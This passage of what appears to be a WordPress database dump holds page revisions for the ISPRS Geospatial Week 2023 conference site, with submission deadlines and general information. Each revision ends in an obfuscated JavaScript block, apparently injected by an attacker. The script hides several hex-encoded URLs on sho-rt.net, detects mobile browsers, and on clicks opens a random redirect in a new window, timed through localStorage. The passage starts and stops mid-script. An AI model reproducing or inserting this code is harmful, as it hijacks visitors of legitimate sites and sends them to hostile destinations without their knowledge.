_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-04 07:12:55','2023-02-04 07:12:55','',2659,'https://gsw2023.com/?p=3769',0,'revision','',0),
(3770,1,'2023-02-04 07:24:32','2023-02-04 07:24:32','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<h5></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<p><a href=\"https://www.conftool.com/gsw2023/\"><span style=\"font-size: 14pt;\"><strong>Submit Your Abstract/Paper Now</strong></span></a></p>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper Author notification: May 1, 2023</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Camera ready paper submission: June 1, 2023</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts Author notification: May 15, 2023</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Camera ready paper submission: June 1, 2023</span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\"><strong>Early bird registration deadline: May 1, 2023</strong></span></li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><strong>Late registration deadline: July 1, 2023</strong></span></li>\n</ul>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-04 07:24:32','2023-02-04 07:24:32','',2659,'https://gsw2023.com/?p=3770',0,'revision','',0),
(3771,1,'2023-02-04 07:25:42','2023-02-04 07:25:42','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></h5>\n<h5 class=\"gap-10\"></h5>\n<ul class=\"nospace\">\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong>Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</strong></span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong>Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</strong></span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong>Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</strong></span></p>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 